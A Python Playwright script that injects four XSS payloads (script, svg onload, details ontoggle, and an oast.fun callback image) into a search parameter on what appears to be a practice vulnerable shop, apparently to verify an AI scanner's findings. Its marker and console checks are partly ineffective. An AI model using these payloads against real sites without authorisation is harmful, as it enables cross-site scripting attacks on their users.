#!/usr/bin/env python3
"""
Quick test script to manually verify XSS payloads work
"""
import asyncio
from playwright.async_api import async_playwright
from urllib.parse import urlencode

# Example payloads generated by LLM (from the test)
PAYLOADS = [
    # Basic Interactsh payload
    '<img src="https://test.oast.fun/x.png">',
    
    # LLM-generated bypasses (examples)
    '<ScRiPt>alert(document.domain)</sCrIpT>',  # Case mixing
    '<svg/onload=alert(document.domain)>',  # Alternative tag
    '<details open ontoggle=alert(document.domain)>',  # Alternative handler
]

async def test_payload(url: str, param: str, payload: str):
    """Test a single payload in browser"""
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=False)
        page = await browser.new_page()
        
        # Build test URL
        test_url = f"{url}?{urlencode({param: payload})}"
        
        print(f"\n{'='*60}")
        print(f"Testing payload: {payload[:50]}...")
        print(f"URL: {test_url[:80]}...")
        
        try:
            # Navigate to page
            await page.goto(test_url, wait_until='networkidle', timeout=10000)
            
            # Wait a bit for JS execution
            await asyncio.sleep(2)
            
            # Check for alert (XSS marker)
            page_content = await page.content()
            
            if 'BUGTRACE-XSS-CONFIRMED' in page_content:
                print("✅ VISUAL MARKER FOUND")
            
            # Take screenshot
            screenshot_path = f"/tmp/test_payload_{hash(payload)}.png"
            await page.screenshot(path=screenshot_path)
            print(f"📸 Screenshot: {screenshot_path}")
            
            # Check console logs
            console_msgs = []
            page.on('console', lambda msg: console_msgs.append(msg.text))
            
            await asyncio.sleep(1)
            
            if console_msgs:
                print(f"📝 Console logs: {console_msgs}")
            
        except Exception as e:
            print(f"❌ Error: {e}")
        
        finally:
            await browser.close()

async def main():
    """Test all payloads"""
    url = "https://ginandjuice.shop/catalog"
    param = "searchTerm"
    
    print(f"Testing {len(PAYLOADS)} payloads against {url}")
    
    for i, payload in enumerate(PAYLOADS, 1):
        print(f"\n[{i}/{len(PAYLOADS)}]", end='')
        await test_payload(url, param, payload)
        
        # Wait between tests
        if i < len(PAYLOADS):
            await asyncio.sleep(2)
    
    print(f"\n{'='*60}")
    print("✅ Testing complete")

if __name__ == "__main__":
    asyncio.run(main())
